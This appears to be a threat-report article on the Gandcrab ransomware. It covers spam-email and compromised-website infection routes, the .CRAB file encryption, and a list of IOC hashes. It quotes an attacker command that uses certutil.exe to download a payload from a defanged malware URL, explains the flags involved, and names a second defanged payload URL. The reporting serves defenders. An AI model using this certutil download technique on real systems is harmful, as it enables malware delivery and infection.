Gandcrab Ransomware

Gandcrab Ransomware Attack being targeted users via compromised websites and leveraged multiple MySQL vulnerabilities to attack various windows users.

Most of the small-medium businesses websites are not aware of new vulnerabilities that released to compromise the websites.

Gandcrab Ransomware is wide spreading Ransomware nowadays with newly updated futures under constant development to target various countries.

It keeps leveraging the thousands of vulnerabilities in Million of web pages and actively targeting users to comprise the system and encrypt to demand the ransom amount.

Apart from this Sophisticated malware are distributed through the legitimate website by compromising the legitimate system.

Gandcrab Ransomware attackers widely scanning the internet web pages to find out the vulnerable websites and leverage it to distribute the ransomware in wide.

Gandcrab Ransomware Infection Vectors

Initially, Gandcrab Ransomware being distributed around the end of the April via a large-scale Email spam campaign that posed as an online order.

Email holds an attached Zip file contains a word document with macros that downloads and executes the Gandcrab ransomware.

Few of other Spam email champaign contain a VB script instead of zipping that has an ability to pull off the ransomware payload by connecting its command & control server.

Also this Malware using a system utility to download the payload and it leveraging certutil.exe which is command line utility that is installed as part of Certificate Services.

Also, it using specific syntax used to download the payload and install into the vicitms machine.
certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe
C:\Users\ADMINI~1\AppData\Local\Temp\FVAacW.exe
  1. -urlcache flag is designed to be used to display or delete URL-cached entries
  2. -f -split flags, the adversaries are able to force the URL to be downloaded to the location

Later on, the file will be executed and install the Gandcrab Ransomware within the target system.

Later on, Cisco researchers observed that the same campaign being distributed from a different location which is an actual legitimate website (www[.]pushpakcourier[.]net) and validated it by successfully downloading the payload from hxxp://www[.]pushpakcourier[.]net/js/kukul.exe. 

Further investigation revealed that the compromised website is running by phpMyAdmin which contains default credentials and multiple MySQL vulnerabilities which was helped to the attacker to leverage it and distribute the ransomware.

Later it will encrypt the victim files and.CRAB extension appended to the file’s name. for example, it Image.jpg will change as Image.jpg.CRAB.

After the complete infection, it displays the ransom notes that contain an information about the payment and the ways to communicate with attackers.

Attacker has been compromised various unsecured sites and used it to distribute the Gandcrab Ransomware in wide.

Gandcrab  IOC Hashes:

6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501
692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08
ad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c
3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e
521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d
9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6
27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad
ce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706
0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5
07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257
0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e
812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0
d25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a
ee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55